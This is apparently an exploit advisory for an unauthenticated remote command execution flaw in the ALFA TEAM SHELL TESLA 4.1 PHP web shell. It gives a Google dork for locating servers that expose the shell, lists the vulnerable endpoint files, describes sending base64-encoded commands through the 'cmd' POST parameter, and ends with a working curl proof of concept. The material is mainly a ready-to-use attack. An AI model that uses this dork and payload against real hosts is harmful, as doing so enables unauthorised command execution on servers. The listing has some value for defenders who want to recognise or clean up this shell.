Alfa Team Shell Tesla 4.1 Remote Code Execution

Alfa Team Shell Tesla version 4.1 suffers from a remote code execution vulnerability.


MD5 | 4e1d936cbae22ea2647ee9d7e6127458

# Exploit Title: ALFA TEAM SHELL TESLA 4.1 - 'cmd' Remote Code Execution (Unauthenticated)
# Google Dork: inurl:/alfacgiapi intext:alfa
# Date: 2021-12-19
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://solevisible.com
# Software Link: https://phpshells.com/alfa-tesla-v4-1-shell
# Version: v4.1
# Tested on: Windows 10 Enterprise x64 , Linux

# [ About - ALFA TEAM SHELL TESLA ] :

#It is one of the most popular web shells used by hackers,They use it to access the server side.

# [ Vulnerable Files ] :

# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa

# [ Description ]:

#Execute commands without authentication or logging in to the web shell,
#To use, find only one of the vulnerable files,
#Convert your commands to base64 And Submit your request using the CMD parameter and the POST method.

# [ POC ] :

curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa

Related Posts